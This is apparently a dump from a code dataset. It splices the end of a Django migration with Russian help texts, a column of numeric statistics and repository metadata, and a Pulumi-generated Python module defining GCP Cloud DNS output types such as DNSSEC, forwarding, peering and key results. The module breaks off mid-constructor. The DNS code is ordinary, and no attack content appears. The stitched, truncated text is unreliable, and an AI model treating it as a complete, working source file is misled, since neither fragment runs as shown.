            model_name='annotation',
            name='teaser',
            field=models.TextField(blank=True, help_text='\u0414\u043b\u044f \u0432\u0438\u0434\u0435\u043e.\n\n <p style="font-size: xx-small; margin-bottom: 1em">\n \u0414\u043b\u044f \u043a\u0443\u0440\u0441\u0438\u0432\u0430, \u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u0430\u0431\u0437\u0430\u0446\u0435\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\n <a target="_blank" href="https://docs.google.com/document/d/1onDgE9wkZSGbXZg5V3GdoPx8gQ4fhXe73E7Sn0qvDY4">\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443 Markdown</a>.</p>\n\n', null=True, unique=True, verbose_name='\u0442\u0438\u0437\u0435\u0440'),
        ),
        migrations.AlterField(
            model_name='annotation',
            name='title',
            field=slavdict.csl_annotations.models.FixedWidthTextField(blank=True, help_text='\n\n \u041e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u0438\u0434\u0435\u043e, \u0444\u0430\u043a\u0443\u043b\u044c\u0442\u0430\u0442\u0438\u0432\u043d\u043e \u0434\u043b\u044f \u043a\u043d\u0438\u0433 \u0438 \u0441\u0442\u0430\u0442\u0435\u0439.<br>\n \u0420\u0443\u0447\u043d\u043e\u0435 \u0443\u043a\u0430\u0437\u0430\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u0440\u0441\u0442\u0432\u0430 \u0432 \u044d\u0442\u043e\u043c \u043f\u043e\u043b\u0435 \u043d\u0435 \u043f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u0435\u0442\u0441\u044f, \u0442\u0430\u043a \u043a\u0430\u043a<br>\n \u0430\u0432\u0442\u043e\u0440 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0431\u0443\u0434\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d (\u0435\u0441\u043b\u0438 \u043e\u043d \u0432\u044b\u0434\u0435\u043b\u0435\u043d \u0433\u0430\u043b\u043e\u0447\u043a\u043e\u0439 \u0432 \u043f\u043e\u043b\u0435<br>\n \xab\u0410\u0432\u0442\u043e\u0440\xbb) \u043f\u0440\u0438 \u0432\u044b\u0432\u043e\u0434\u0435 \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u0430 \u0430\u043d\u043d\u043e\u0442\u0430\u0446\u0438\u0438 \u043d\u0430 \u043f\u043e\u0440\u0442\u0430\u043b\u0435.\n\n\n\n <p style="font-size: xx-small; margin-bottom: 1em">\n \u0414\u043b\u044f \u043a\u0443\u0440\u0441\u0438\u0432\u0430, \u0441\u0441\u044b\u043b\u043e\u043a \u0438 \u0430\u0431\u0437\u0430\u0446\u0435\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435\n <a target="_blank" href="https://docs.google.com/document/d/1onDgE9wkZSGbXZg5V3GdoPx8gQ4fhXe73E7Sn0qvDY4">\u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0443 Markdown</a>.</p>\n\n', max_length=200, null=True, verbose_name='\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435'),
        ),
    ]
| 163.857143
| 1,926
| 0.744551
| 1,027
| 6,882
| 4.961052
| 0.115871
| 0.035329
| 0.023553
| 0.031403
| 0.6895
| 0.650245
| 0.578803
| 0.544652
| 0.536801
| 0.512267
| 0
| 0.429868
| 0.087329
| 6,882
| 41
| 1,927
| 167.853659
| 0.381309
| 0.010026
| 0
| 0.454545
| 1
| 0.181818
| 0.815859
| 0.571806
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.060606
| 0
| 0.151515
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df2b48678403775cd7bcfc208f846c0ae8896701
| 39,056
|
py
|
Python
|
sdk/python/pulumi_gcp/dns/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/dns/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/dns/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
# Public API of this generated module: output types for DNS managed-zone and
# policy configuration, plus the GetKeys* result types.
__all__ = [
    'ManagedZoneDnssecConfig',
    'ManagedZoneDnssecConfigDefaultKeySpec',
    'ManagedZoneForwardingConfig',
    'ManagedZoneForwardingConfigTargetNameServer',
    'ManagedZonePeeringConfig',
    'ManagedZonePeeringConfigTargetNetwork',
    'ManagedZonePrivateVisibilityConfig',
    'ManagedZonePrivateVisibilityConfigNetwork',
    'ManagedZoneServiceDirectoryConfig',
    'ManagedZoneServiceDirectoryConfigNamespace',
    'PolicyAlternativeNameServerConfig',
    'PolicyAlternativeNameServerConfigTargetNameServer',
    'PolicyNetwork',
    'GetKeysKeySigningKeyResult',
    'GetKeysKeySigningKeyDigestResult',
    'GetKeysZoneSigningKeyResult',
    'GetKeysZoneSigningKeyDigestResult',
]
@pulumi.output_type
class ManagedZoneDnssecConfig(dict):
    """DNSSEC configuration of a ManagedZone.

    Generated by the Pulumi Terraform Bridge (tfgen); dict access uses the
    wire-format camelCase keys, while the snake_case @property getters are
    the supported access path (raw camelCase lookups trigger a warning).
    """

    @staticmethod
    def __key_warning(key: str):
        # Map known camelCase wire keys to their snake_case property names and
        # warn when a caller accesses the dict with the camelCase form.
        suggest = None
        if key == "defaultKeySpecs":
            suggest = "default_key_specs"
        elif key == "nonExistence":
            suggest = "non_existence"
        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in ManagedZoneDnssecConfig. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        ManagedZoneDnssecConfig.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        ManagedZoneDnssecConfig.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 default_key_specs: Optional[Sequence['outputs.ManagedZoneDnssecConfigDefaultKeySpec']] = None,
                 kind: Optional[str] = None,
                 non_existence: Optional[str] = None,
                 state: Optional[str] = None):
        """
        :param Sequence['ManagedZoneDnssecConfigDefaultKeySpecArgs'] default_key_specs: Specifies parameters that will be used for generating initial DnsKeys
               for this ManagedZone. If you provide a spec for keySigning or zoneSigning,
               you must also provide one for the other.
               default_key_specs can only be updated when the state is `off`.
               Structure is documented below.
        :param str kind: Identifies what kind of resource this is
        :param str non_existence: Specifies the mechanism used to provide authenticated denial-of-existence responses.
               non_existence can only be updated when the state is `off`.
               Possible values are `nsec` and `nsec3`.
        :param str state: Specifies whether DNSSEC is enabled, and what mode it is in
               Possible values are `off`, `on`, and `transfer`.
        """
        # Only set keys that were actually provided, so absent optional fields
        # stay missing from the underlying dict rather than mapping to None.
        if default_key_specs is not None:
            pulumi.set(__self__, "default_key_specs", default_key_specs)
        if kind is not None:
            pulumi.set(__self__, "kind", kind)
        if non_existence is not None:
            pulumi.set(__self__, "non_existence", non_existence)
        if state is not None:
            pulumi.set(__self__, "state", state)

    @property
    @pulumi.getter(name="defaultKeySpecs")
    def default_key_specs(self) -> Optional[Sequence['outputs.ManagedZoneDnssecConfigDefaultKeySpec']]:
        """
        Specifies parameters that will be used for generating initial DnsKeys
        for this ManagedZone. If you provide a spec for keySigning or zoneSigning,
        you must also provide one for the other.
        default_key_specs can only be updated when the state is `off`.
        Structure is documented below.
        """
        return pulumi.get(self, "default_key_specs")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """
        Identifies what kind of resource this is
        """
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter(name="nonExistence")
    def non_existence(self) -> Optional[str]:
        """
        Specifies the mechanism used to provide authenticated denial-of-existence responses.
        non_existence can only be updated when the state is `off`.
        Possible values are `nsec` and `nsec3`.
        """
        return pulumi.get(self, "non_existence")

    @property
    @pulumi.getter
    def state(self) -> Optional[str]:
        """
        Specifies whether DNSSEC is enabled, and what mode it is in
        Possible values are `off`, `on`, and `transfer`.
        """
        return pulumi.get(self, "state")
@pulumi.output_type
class ManagedZoneDnssecConfigDefaultKeySpec(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"keyLength": "key_length", "keyType": "key_type"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in ManagedZoneDnssecConfigDefaultKeySpec. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 algorithm: Optional[str] = None,
                 key_length: Optional[int] = None,
                 key_type: Optional[str] = None,
                 kind: Optional[str] = None):
        """
        :param str algorithm: Mnemonic of the DNSSEC algorithm for this key.
               Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
        :param int key_length: Key length in bits.
        :param str key_type: Whether this is a key signing key (KSK) or a zone
               signing key (ZSK). KSKs carry the Secure Entry Point flag and,
               while active, sign only resource record sets of type DNSKEY;
               ZSKs lack that flag and sign every other record set type.
               Possible values are `keySigning` and `zoneSigning`.
        :param str kind: Identifies what kind of resource this is.
        """
        # Only store the fields that were actually supplied.
        for attr, value in (("algorithm", algorithm),
                            ("key_length", key_length),
                            ("key_type", key_type),
                            ("kind", kind)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def algorithm(self) -> Optional[str]:
        """
        Mnemonic of the DNSSEC algorithm for this key. Possible values are
        `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
        """
        return pulumi.get(self, "algorithm")

    @property
    @pulumi.getter(name="keyLength")
    def key_length(self) -> Optional[int]:
        """
        Key length in bits.
        """
        return pulumi.get(self, "key_length")

    @property
    @pulumi.getter(name="keyType")
    def key_type(self) -> Optional[str]:
        """
        Whether this is a key signing key (KSK) or a zone signing key (ZSK).
        KSKs carry the Secure Entry Point flag and, while active, sign only
        resource record sets of type DNSKEY; ZSKs lack that flag and sign
        every other record set type.
        Possible values are `keySigning` and `zoneSigning`.
        """
        return pulumi.get(self, "key_type")

    @property
    @pulumi.getter
    def kind(self) -> Optional[str]:
        """
        Identifies what kind of resource this is.
        """
        return pulumi.get(self, "kind")
@pulumi.output_type
class ManagedZoneForwardingConfig(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"targetNameServers": "target_name_servers"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in ManagedZoneForwardingConfig. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 target_name_servers: Sequence['outputs.ManagedZoneForwardingConfigTargetNameServer']):
        """
        :param Sequence['ManagedZoneForwardingConfigTargetNameServerArgs'] target_name_servers:
               Target name servers to forward to; Cloud DNS picks the best
               available server when more than one target is given.
               Structure is documented below.
        """
        pulumi.set(__self__, "target_name_servers", target_name_servers)

    @property
    @pulumi.getter(name="targetNameServers")
    def target_name_servers(self) -> Sequence['outputs.ManagedZoneForwardingConfigTargetNameServer']:
        """
        Target name servers to forward to; Cloud DNS picks the best available
        server when more than one target is given.
        Structure is documented below.
        """
        return pulumi.get(self, "target_name_servers")
@pulumi.output_type
class ManagedZoneForwardingConfigTargetNameServer(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"ipv4Address": "ipv4_address",
                   "forwardingPath": "forwarding_path"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in ManagedZoneForwardingConfigTargetNameServer. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 ipv4_address: str,
                 forwarding_path: Optional[str] = None):
        """
        :param str ipv4_address: IPv4 address of a target name server.
        :param str forwarding_path: Forwarding path for this TargetNameServer.
               When unset or `default`, Cloud DNS routes by address range
               (RFC1918 addresses go to the VPC, non-RFC1918 addresses go to
               the Internet); when `private`, queries for this target always
               go through the VPC.
               Possible values are `default` and `private`.
        """
        pulumi.set(__self__, "ipv4_address", ipv4_address)
        if forwarding_path is not None:
            pulumi.set(__self__, "forwarding_path", forwarding_path)

    @property
    @pulumi.getter(name="ipv4Address")
    def ipv4_address(self) -> str:
        """
        IPv4 address of a target name server.
        """
        return pulumi.get(self, "ipv4_address")

    @property
    @pulumi.getter(name="forwardingPath")
    def forwarding_path(self) -> Optional[str]:
        """
        Forwarding path for this TargetNameServer. When unset or `default`,
        Cloud DNS routes by address range (RFC1918 addresses go to the VPC,
        non-RFC1918 addresses go to the Internet); when `private`, queries
        for this target always go through the VPC.
        Possible values are `default` and `private`.
        """
        return pulumi.get(self, "forwarding_path")
@pulumi.output_type
class ManagedZonePeeringConfig(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"targetNetwork": "target_network"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in ManagedZonePeeringConfig. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 target_network: 'outputs.ManagedZonePeeringConfigTargetNetwork'):
        """
        :param 'ManagedZonePeeringConfigTargetNetworkArgs' target_network:
               The network with which to peer. Structure is documented below.
        """
        pulumi.set(__self__, "target_network", target_network)

    @property
    @pulumi.getter(name="targetNetwork")
    def target_network(self) -> 'outputs.ManagedZonePeeringConfigTargetNetwork':
        """
        The network with which to peer. Structure is documented below.
        """
        return pulumi.get(self, "target_network")
@pulumi.output_type
class ManagedZonePeeringConfigTargetNetwork(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"networkUrl": "network_url"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in ManagedZonePeeringConfigTargetNetwork. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 network_url: str):
        """
        :param str network_url: ID or fully qualified URL of the VPC network
               queries are forwarded to, formatted like
               `projects/{project}/global/networks/{network}` or
               `https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
        """
        pulumi.set(__self__, "network_url", network_url)

    @property
    @pulumi.getter(name="networkUrl")
    def network_url(self) -> str:
        """
        ID or fully qualified URL of the VPC network queries are forwarded
        to, formatted like `projects/{project}/global/networks/{network}` or
        `https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
        """
        return pulumi.get(self, "network_url")
@pulumi.output_type
class ManagedZonePrivateVisibilityConfig(dict):
    """Private-visibility configuration of a managed zone."""

    def __init__(__self__, *,
                 networks: Sequence['outputs.ManagedZonePrivateVisibilityConfigNetwork']):
        # Network entries; structure is documented on the nested type.
        pulumi.set(__self__, "networks", networks)

    @property
    @pulumi.getter
    def networks(self) -> Sequence['outputs.ManagedZonePrivateVisibilityConfigNetwork']:
        """Return the configured network entries."""
        return pulumi.get(self, "networks")
@pulumi.output_type
class ManagedZonePrivateVisibilityConfigNetwork(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"networkUrl": "network_url"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in ManagedZonePrivateVisibilityConfigNetwork. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 network_url: str):
        """
        :param str network_url: ID or fully qualified URL of the VPC network
               queries are forwarded to, formatted like
               `projects/{project}/global/networks/{network}` or
               `https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
        """
        pulumi.set(__self__, "network_url", network_url)

    @property
    @pulumi.getter(name="networkUrl")
    def network_url(self) -> str:
        """
        ID or fully qualified URL of the VPC network queries are forwarded
        to, formatted like `projects/{project}/global/networks/{network}` or
        `https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
        """
        return pulumi.get(self, "network_url")
@pulumi.output_type
class ManagedZoneServiceDirectoryConfig(dict):
    """Service Directory configuration of a managed zone."""

    def __init__(__self__, *,
                 namespace: 'outputs.ManagedZoneServiceDirectoryConfigNamespace'):
        """
        :param 'ManagedZoneServiceDirectoryConfigNamespaceArgs' namespace:
               The namespace associated with the zone.
               Structure is documented below.
        """
        pulumi.set(__self__, "namespace", namespace)

    @property
    @pulumi.getter
    def namespace(self) -> 'outputs.ManagedZoneServiceDirectoryConfigNamespace':
        """
        The namespace associated with the zone. Structure is documented below.
        """
        return pulumi.get(self, "namespace")
@pulumi.output_type
class ManagedZoneServiceDirectoryConfigNamespace(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"namespaceUrl": "namespace_url"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in ManagedZoneServiceDirectoryConfigNamespace. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 namespace_url: str):
        """
        :param str namespace_url: Fully qualified or partial URL of the
               Service Directory namespace associated with the zone,
               formatted like
               `https://servicedirectory.googleapis.com/v1/projects/{project}/locations/{location}/namespaces/{namespace_id}`
               or simply `projects/{project}/locations/{location}/namespaces/{namespace_id}`.
               Ignored for `public` visibility zones.
        """
        pulumi.set(__self__, "namespace_url", namespace_url)

    @property
    @pulumi.getter(name="namespaceUrl")
    def namespace_url(self) -> str:
        """
        Fully qualified or partial URL of the Service Directory namespace
        associated with the zone, formatted like
        `https://servicedirectory.googleapis.com/v1/projects/{project}/locations/{location}/namespaces/{namespace_id}`
        or simply `projects/{project}/locations/{location}/namespaces/{namespace_id}`.
        Ignored for `public` visibility zones.
        """
        return pulumi.get(self, "namespace_url")
@pulumi.output_type
class PolicyAlternativeNameServerConfig(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"targetNameServers": "target_name_servers"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in PolicyAlternativeNameServerConfig. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 target_name_servers: Sequence['outputs.PolicyAlternativeNameServerConfigTargetNameServer']):
        """
        :param Sequence['PolicyAlternativeNameServerConfigTargetNameServerArgs'] target_name_servers:
               Alternative name server for the associated networks. When
               specified, every DNS query is forwarded to a name server of
               your choosing, and names such as .internal become unavailable.
               Structure is documented below.
        """
        pulumi.set(__self__, "target_name_servers", target_name_servers)

    @property
    @pulumi.getter(name="targetNameServers")
    def target_name_servers(self) -> Sequence['outputs.PolicyAlternativeNameServerConfigTargetNameServer']:
        """
        Alternative name server for the associated networks. When specified,
        every DNS query is forwarded to a name server of your choosing, and
        names such as .internal become unavailable.
        Structure is documented below.
        """
        return pulumi.get(self, "target_name_servers")
@pulumi.output_type
class PolicyAlternativeNameServerConfigTargetNameServer(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"ipv4Address": "ipv4_address",
                   "forwardingPath": "forwarding_path"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in PolicyAlternativeNameServerConfigTargetNameServer. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 ipv4_address: str,
                 forwarding_path: Optional[str] = None):
        """
        :param str ipv4_address: IPv4 address to forward to.
        :param str forwarding_path: Forwarding path for this TargetNameServer.
               When unset or `default`, Cloud DNS routes by address range
               (RFC1918 addresses go to the VPC, non-RFC1918 addresses go to
               the Internet); when `private`, queries for this target always
               go through the VPC.
               Possible values are `default` and `private`.
        """
        pulumi.set(__self__, "ipv4_address", ipv4_address)
        if forwarding_path is not None:
            pulumi.set(__self__, "forwarding_path", forwarding_path)

    @property
    @pulumi.getter(name="ipv4Address")
    def ipv4_address(self) -> str:
        """
        IPv4 address to forward to.
        """
        return pulumi.get(self, "ipv4_address")

    @property
    @pulumi.getter(name="forwardingPath")
    def forwarding_path(self) -> Optional[str]:
        """
        Forwarding path for this TargetNameServer. When unset or `default`,
        Cloud DNS routes by address range (RFC1918 addresses go to the VPC,
        non-RFC1918 addresses go to the Internet); when `private`, queries
        for this target always go through the VPC.
        Possible values are `default` and `private`.
        """
        return pulumi.get(self, "forwarding_path")
@pulumi.output_type
class PolicyNetwork(dict):
    @staticmethod
    def __key_warning(key: str):
        # Warn when a camelCase wire key is used instead of the snake_case property.
        renamed = {"networkUrl": "network_url"}.get(key)
        if renamed is not None:
            pulumi.log.warn(f"Key '{key}' not found in PolicyNetwork. Access the value via the '{renamed}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        self.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default=None) -> Any:
        self.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 network_url: str):
        """
        :param str network_url: ID or fully qualified URL of the VPC network
               queries are forwarded to, formatted like
               `projects/{project}/global/networks/{network}` or
               `https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
        """
        pulumi.set(__self__, "network_url", network_url)

    @property
    @pulumi.getter(name="networkUrl")
    def network_url(self) -> str:
        """
        ID or fully qualified URL of the VPC network queries are forwarded
        to, formatted like `projects/{project}/global/networks/{network}` or
        `https://www.googleapis.com/compute/v1/projects/{project}/global/networks/{network}`
        """
        return pulumi.get(self, "network_url")
@pulumi.output_type
class GetKeysKeySigningKeyResult(dict):
    def __init__(__self__, *,
                 algorithm: str,
                 creation_time: str,
                 description: str,
                 digests: Sequence['outputs.GetKeysKeySigningKeyDigestResult'],
                 ds_record: str,
                 id: str,
                 is_active: bool,
                 key_length: int,
                 key_tag: int,
                 public_key: str):
        """
        :param str algorithm: DNSSEC algorithm mnemonic; immutable after creation. Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
        :param str creation_time: Control-plane creation time, in RFC3339 text format.
        :param str description: User-supplied string of at most 1024 characters, mutable.
        :param Sequence['GetKeysKeySigningKeyDigestArgs'] digests: Cryptographic hashes of the DNSKEY resource record for this DnsKey, needed to construct a DS record pointing at this key. Each contains:
        :param str ds_record: DS record derived from the KSK, used when [delegating](https://cloud.google.com/dns/docs/dnssec-advanced#subdelegation) DNSSEC-signed subdomains.
        :param str id: Server-defined unique identifier for the resource.
        :param bool is_active: Whether the key signs subsequent ManagedZone changes; inactive keys remain published as DNSKEY records for resolvers validating existing signatures.
        :param int key_length: Key length in bits; immutable after creation.
        :param int key_tag: Non-cryptographic hash of the associated DNSKEY record, used to identify a DNSKEY quickly (not a unique identifier) and referenced by the parent zone's DS record. Range [0, 65535]; computed per RFC4034 Appendix B.
        :param str public_key: Base64-encoded public half of this key.
        """
        # All fields are required, so store them unconditionally.
        for attr, value in (("algorithm", algorithm),
                            ("creation_time", creation_time),
                            ("description", description),
                            ("digests", digests),
                            ("ds_record", ds_record),
                            ("id", id),
                            ("is_active", is_active),
                            ("key_length", key_length),
                            ("key_tag", key_tag),
                            ("public_key", public_key)):
            pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def algorithm(self) -> str:
        """
        DNSSEC algorithm mnemonic; immutable after creation. Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
        """
        return pulumi.get(self, "algorithm")

    @property
    @pulumi.getter(name="creationTime")
    def creation_time(self) -> str:
        """
        Control-plane creation time, in RFC3339 text format.
        """
        return pulumi.get(self, "creation_time")

    @property
    @pulumi.getter
    def description(self) -> str:
        """
        User-supplied string of at most 1024 characters, mutable.
        """
        return pulumi.get(self, "description")

    @property
    @pulumi.getter
    def digests(self) -> Sequence['outputs.GetKeysKeySigningKeyDigestResult']:
        """
        Cryptographic hashes of the DNSKEY resource record for this DnsKey,
        needed to construct a DS record pointing at this key. Each contains:
        """
        return pulumi.get(self, "digests")

    @property
    @pulumi.getter(name="dsRecord")
    def ds_record(self) -> str:
        """
        DS record derived from the KSK, used when [delegating](https://cloud.google.com/dns/docs/dnssec-advanced#subdelegation) DNSSEC-signed subdomains.
        """
        return pulumi.get(self, "ds_record")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        Server-defined unique identifier for the resource.
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter(name="isActive")
    def is_active(self) -> bool:
        """
        Whether the key signs subsequent ManagedZone changes; inactive keys
        remain published as DNSKEY records for resolvers validating existing
        signatures.
        """
        return pulumi.get(self, "is_active")

    @property
    @pulumi.getter(name="keyLength")
    def key_length(self) -> int:
        """
        Key length in bits; immutable after creation.
        """
        return pulumi.get(self, "key_length")

    @property
    @pulumi.getter(name="keyTag")
    def key_tag(self) -> int:
        """
        Non-cryptographic hash of the associated DNSKEY record, used to
        identify a DNSKEY quickly (not a unique identifier) and referenced by
        the parent zone's DS record. Range [0, 65535]; computed per RFC4034
        Appendix B.
        """
        return pulumi.get(self, "key_tag")

    @property
    @pulumi.getter(name="publicKey")
    def public_key(self) -> str:
        """
        Base64-encoded public half of this key.
        """
        return pulumi.get(self, "public_key")
@pulumi.output_type
class GetKeysKeySigningKeyDigestResult(dict):
    def __init__(__self__, *,
                 digest: Optional[str] = None,
                 type: Optional[str] = None):
        """
        :param str digest: Base-16 encoded digest bytes, suitable for use in a DS resource record.
        :param str type: Algorithm used to compute this digest. Possible values are `sha1`, `sha256` and `sha384`
        """
        # Only store the fields that were actually supplied.
        for attr, value in (("digest", digest), ("type", type)):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def digest(self) -> Optional[str]:
        """
        Base-16 encoded digest bytes, suitable for use in a DS resource record.
        """
        return pulumi.get(self, "digest")

    @property
    @pulumi.getter
    def type(self) -> Optional[str]:
        """
        Algorithm used to compute this digest. Possible values are `sha1`, `sha256` and `sha384`
        """
        return pulumi.get(self, "type")
@pulumi.output_type
class GetKeysZoneSigningKeyResult(dict):
    def __init__(__self__, *,
                 algorithm: str,
                 creation_time: str,
                 description: str,
                 digests: Sequence['outputs.GetKeysZoneSigningKeyDigestResult'],
                 id: str,
                 is_active: bool,
                 key_length: int,
                 key_tag: int,
                 public_key: str):
        """
        :param str algorithm: DNSSEC algorithm mnemonic; immutable after creation. Possible values are `ecdsap256sha256`, `ecdsap384sha384`, `rsasha1`, `rsasha256`, and `rsasha512`.
        :param str creation_time: Control-plane creation time, in RFC3339 text format.
        :param str description: User-supplied string of at most 1024 characters, mutable.
        :param Sequence['GetKeysZoneSigningKeyDigestArgs'] digests: Cryptographic hashes of the DNSKEY resource record for this DnsKey, needed to construct a DS record pointing at this key. Each contains:
        :param str id: Server-defined unique identifier for the resource.
        :param bool is_active: Whether the key signs subsequent ManagedZone changes; inactive keys remain published as DNSKEY records for resolvers validating existing signatures.
        :param int key_length: Key length in bits; immutable after creation.
        :param int key_tag: Non-cryptographic hash of the associated DNSKEY record, used to identify a DNSKEY quickly (not a unique identifier) and referenced by the parent zone's DS record. Range [0, 65535]; computed per RFC4034 Appendix B.
        :param str public_key: Base64-encoded public half of this key.
        """
        # All fields are required, so store them unconditionally.
        for attr, value in (("algorithm", algorithm),
                            ("creation_time", creation_time),
                            ("description", description),
                            ("digests", digests),
                            ("id", id),
                            ("is_active", is_active),
